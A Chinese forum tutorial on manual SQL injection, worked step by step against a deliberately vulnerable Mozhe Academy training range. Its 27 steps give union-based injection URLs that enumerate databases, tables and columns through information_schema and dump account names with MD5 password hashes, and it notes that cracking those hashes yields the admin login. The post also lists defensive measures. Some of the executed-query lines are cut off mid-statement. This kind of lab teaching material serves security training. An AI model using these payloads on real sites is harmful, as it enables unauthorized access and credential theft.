设为首页 收藏本站
查看: 828|回复: 0

[经验分享] 零基础学习手工SQL注入

[复制链接]
发表于 2018-10-19 10:56:51 | 显示全部楼层 |阅读模式
SQL注入介绍
  SQL注入,其实就是用户浏览器提交的变量内容,应用程序(代码可能是asp、aspx、php、jsp等)对浏览器提交过来的数据未过滤,直接去数据库查询,导致把数据库里面其他内容(如管理账户和密码)查询返回到页面上。先看个《墨者学院故事会》的一个小故事:
  某个镇子里,银行保险柜做为一个公共区域帮居民存储贵重物品,为了防止错拿、多拿他人物品,银行规定:限制每人每次只能带一把开自己保险柜的钥匙,取自己的东西出入。在银行安检门口有个负责检查的安检员,安检员职责就是检查进入银行保险柜取物品的人每次是否只带了一把钥匙。
  这个镇子上有多家银行,有个人名字叫“路人甲”,他去A银行取物品,A银行的安检员尽职尽责,对“路人甲”的全身上下、里里外外一丝不苟的检查N遍,确定他只带了一把自己的钥匙后,才放行让他进去取物品;后来“路人甲”去B银行去物品,他发现B银行的安检员是行长的小舅子,岗位就是个摆设,从未来上过班,进入保险柜也无人进行检查。所以“路人甲”带着他和他老婆的钥匙一起带来取,发现成功取到物品后,“路人甲”就多带把螺丝刀,通过安检门,利用螺丝刀打开行长小舅子的柜子,成功取走了他的物品,“路人甲”发现有行长的柜子是用钢板焊的,螺丝刀无法拆开,他就多带了把切割机,通过安检门,花了大功夫用切割机把柜子打开,把行长柜子里的东西全部取走了。
  “路人甲”发现这样可以“致富”,他就整天从各个银行逛来逛去,去找安检不严的银行去取他人的东西。每个银行的安检门的摄像头都把他出入记录了下来,终于有一天,有家银行告诉了警察,警察调取了摄像头视频内容,把“路人甲”給逮捕了。根据相关法律法规,“路人甲”涉嫌未授权获取(***)他人物品,被判刑入狱。
  我们把这个故事里面的每个内容分配个角色:
  ◆ 镇子==互联网
  ◆ 银行==业务系统(网站)
  ◆ 安检门==应用程序(代码)
  ◆ 安检员==过滤非安全代码(如SQL注入、XSS等危险代码)
  ◆ 保险柜的物品==存储在数据库中的数据,可能包含账户密码等敏感数据
  ◆ 小舅子保险柜的物品==业务系统(网站)的管理权限
  ◆ 行长保险柜的物品==服务器(主机)权限
  ◆ “路人甲”==操作浏览器的人
  ◆ “路人甲”的钥匙==提交的正常变量内容
  ◆ “路人甲”的老婆钥匙==提交的测试SQL注入的语句
  ◆ 螺丝刀==提交的SQL注入其他语句
  ◆ 切割机==WebShell或者提权的命令
  ◆ 摄像头==各种日志记录
  ◆ 警察==现实中的警察叔叔
  ◆ 法律法规==《刑法》、《网络安全法》
  如果“路人甲”是一个安保公司的人,他来給银行做安全防护,他应该最清楚银行哪些地方是最薄弱的环节。可以給银行做个安全防护,镇上来取物品的人比较多,就多做几个大门(负载均衡),給银行的安检门外多加几层安检通道(防火墙、WAF、IPS、IDS等安全设备),把行长的小舅子换掉(修补漏洞),每天来检查安检人员是否在岗位上工作(定期检测),把保险柜和安检分别放在不同的房间(数据库与应用系统分离),全部摄像头开启(开启日志),除了这之外,还有多种安全防护方式。这里就不在讲故事了,真正到现实的业务系统的加固,是需要根据业务场景来决定的。
在线靶场地址
  以下是一个Nginx+PHP+MySQL的业务场景靶场,其中php代码对参数内容未做任何过滤,导致SQL注入的产生,这个是最简单、基础的SQL注入练习环节,需要用户了解MySQL最基础的语法和数据库结构,如果基础较差,请自行补充MySQL基础知识。
  MySQL手工注入靶场(本文所描述环境):https://www.mozhe.cn/bug/detail/82
  手工SQL注入靶场专题:https://www.mozhe.cn/Special/SQL_Injection
手工SQL注入详解
  手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。
  开启靶场环境:
DSC0000.jpg

  第1步:
DSC0001.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1

  数据库执行语句:select * from news where>  页面返回描述:返回内容正常
  分析解说:正常浏览页面,找到有参数的地方,如id。
  第2步:
DSC0002.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=1

  数据库执行语句:select * from news where>  页面返回描述:返回内容正常
  分析解说:测试SQL语句。
  第3步:
DSC0003.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2

  数据库执行语句:select * from news where>  页面返回描述:返回内容为空
  分析解说:因为sql语句中,1=2不成立。
  第4步:
DSC0004.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 order by 1

  数据库执行语句:select * from news where>  页面返回描述:返回内容正常
  分析解说:通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有1个字段。
  第5步:

  页面提交:http://mozhe.cn/new_list.php?id=1 order by 2

  数据库执行语句:select * from news where>  页面返回描述:返回内容正常
  分析解说:通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有2个字段。
  第6步:

  页面提交:http://mozhe.cn/new_list.php?id=1 order by 3

  数据库执行语句:select * from news where>  页面返回描述:返回内容正常
  分析解说:通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有3个字段。
  第7步:

  页面提交:http://mozhe.cn/new_list.php?id=1 order by 4

  数据库执行语句:select * from news where>  页面返回描述:返回内容正常
  分析解说:通过SQL语句中order by N 来判断有几个字段,返回内容正常,可以确定至少有4个字段。
  第8步:
DSC0005.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 order by 5

  数据库执行语句:select * from news where>  页面返回描述:返回内容为空
  分析解说:通过SQL语句中order by N 来判断有几个字段,返回内容不正常,说明字段数少于5个。
  第9步:
DSC0006.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,2,3,4

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为2,内容的位置显示为3

  分析解说:通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段,原本的查询应该是select>
  第10步:
DSC0007.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,database(),version(),4

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为mozhe_Discuz_StormGroup,内容的位置显示为5.7.22-0ubuntu0.16.04.1
  分析解说:SQL语句中database()是查询当前数据库的名称(语法:select database();),一个服务器上可能有多个数据库,version()是查询当前数据的版本(语法:select version();),这里是这2个内容分别显示在第2、3的位置上,mozhe_Discuz_StormGroup为数据库,5.7.22-0ubuntu0.16.04.1为数据库版本和操作系统的版本。
  第11步:
DSC0008.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 0,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为information_schema,内容的位置显示为3
  分析解说:这里涉及到数据库information_schema、表SCHEMATA、列SCHEMA_NAME三个内容,数据库information_schema是MySQL系统自带的数据库,其中记录了当前数据库系统中大部分我们需要了结的信息,比如字符集,权限相关,数据库实体对象信息,外检约束,分区,压缩表,表信息,索引信息,参数,优化,锁和事物等等。说白了,就是这个默认自带的数据中,存储了MySQL的数据库名字、表名字、列名字和其他信息,通过information_schema我们可以查看整个MySQL实例的情况。information_schema的详细介绍请自行补习(最好是自己安装一个mysql,连上去看看),limit 0,1意思是从第0行起,取1行数据,information_schema为获取的第1个数据库名称。
  第12步:
DSC0009.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 1,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为mozhe_Discuz_StormGroup,内容的位置显示为3
  分析解说:limit 1,1意思是从第1行起,取1行数据,mozhe_Discuz_StormGroup为获取的第2个数据库名称。
  第13步:
DSC00010.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 2,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为mysql,内容的位置显示为3
  分析解说:limit 2,1意思是从第2行起,取1行数据,mysql为获取的第3个数据库名称。
  第14步:
DSC00011.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 3,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为performance_schema,内容的位置显示为3
  分析解说:limit 3,1意思是从第3行起,取1行数据,performance_schema为获取的第4个数据库名称。
  第15步:
DSC00012.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 4,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为sys,内容的位置显示为3
  分析解说:limit 4,1意思是从第4行起,取1行数据,sys为获取的第5个数据库名称。
  第16步:
DSC00013.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 5,1

  数据库执行语句:select * from news where>  页面返回描述:返回内容为空
  分析解说:limit 5,1意思是从第5行起,取1行数据,返回为空,说明只有5个数据库information_schema、mozhe_Discuz_StormGroup、mysql、performance_schema、sys。
  第17步:
DSC00014.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 0,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为StormGroup_member,内容的位置显示为3
  分析解说:查询对应数据库mozhe_Discuz_StormGroup的第1个数据表名称,limit 0,1,第1个表名为StormGroup_member。
  第18步:
DSC00015.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 1,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为notice,内容的位置显示为3
  分析解说:查询对应数据库mozhe_Discuz_StormGroup的第2个数据表名称,limit 1,1,第2个表名为notice。
  第19步:
DSC00016.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 2,1

  数据库执行语句:select * from news where>  页面返回描述:返回内容为空
  分析解说:返回为空,说明数据库mozhe_Discuz_StormGroup只有2个数据表,StormGroup_member、notice。
  第20步:
DSC00017.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 0,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为id,内容的位置显示为int(11)
  分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第1个字段名称与类型,第1个名称为id,类型:整型int(11)。
  第21步:
DSC00018.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 1,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为name,内容的位置显示为varchar(20)
  分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第2个字段名称与类型,第2个名称为name,类型:字符型varchar(20)。
  第22步:
DSC00019.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 2,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为password,内容的位置显示为varchar(255)
  分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第3个字段名称与类型,第3个名称为passworde,类型:字符型varchar(255)。
  第23步:
DSC00020.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 3,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为status,内容的位置显示为int(11)
  分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第4个字段名称与类型,第4个名称为id,类型:整型int(11)。
  第24步:
DSC00021.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA='mozhe_Discuz_StormGroup' and TABLE_NAME='StormGroup_member' limit 4,1

  数据库执行语句:select * from news where>  页面返回描述:返回内容为空
  分析解说:返回为空,说明数据库mozhe_Discuz_StormGroup中的表StormGroup_member只有4个字段,名称为:id,name,password,status。
  第25步:
DSC00022.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,count(*),3,4 from mozhe_Discuz_StormGroup.StormGroup_member
  数据库执行语句:select  from news where>),3,4 from mozhe_Discuz_StormGroup.StormGroup_member
  页面返回描述:在原来的标题上位置显示为2,内容的位置显示为3
  分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中数据总数,共有2条数据。
  第26步:
DSC00023.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为mozhe-356f589a7df439f6f744ff19bb8092c0-0,内容的位置显示为3
  分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第1条数据的name、password、status的内容,三者之间用-连接起来,CONCAT的是把产生的字符串连接起来,这个地方拼接在一起时为了在一个地方全部显示出来。可以获得第一条数据的name账户为mozhe,密码password为356f589a7df439f6f744ff19bb8092c0(md5加密后的密码,可通过解密获到明文),status账户状态为0。
  第27步:
DSC00024.jpg

  页面提交:http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,CONCAT(name,'-',password,'-',status),3,4 from mozhe_Discuz_StormGroup.StormGroup_member limit 1,1

  数据库执行语句:select * from news where>  页面返回描述:在原来的标题上位置显示为mozhe-6380305ffa6520047acfe95d29ae707b-1,内容的位置显示为3
  分析解说:查询数据库mozhe_Discuz_StormGroup的表StormGroup_member中的第2条数据的name、password、status的内容,三者之间用-连接起来,CONCAT的是把产生的字符串连接起来,这个地方拼接在一起时为了在一个地方全部显示出来。可以获得第一条数据的name账户为mozhe,密码password为6380305ffa6520047acfe95d29ae707b(md5加密后的密码,可通过解密获到明文),status账户状态为1。
  把最终MD5后的密码解密出来,就可以得到后台登录的明文密码了。
  这个过程中,所有的SQL注入语句未做任何的转义和注释,在实际过程中,可能遇到对注入点进行处理,闭合的引号,括号等要先进行闭合,字符串的十六进制,注释掉多余的语句等等。


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-623547-1-1.html 上篇帖子: sql 提取数字、字母、汉字 下篇帖子: iscsi-server端配置,以及clients连接。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表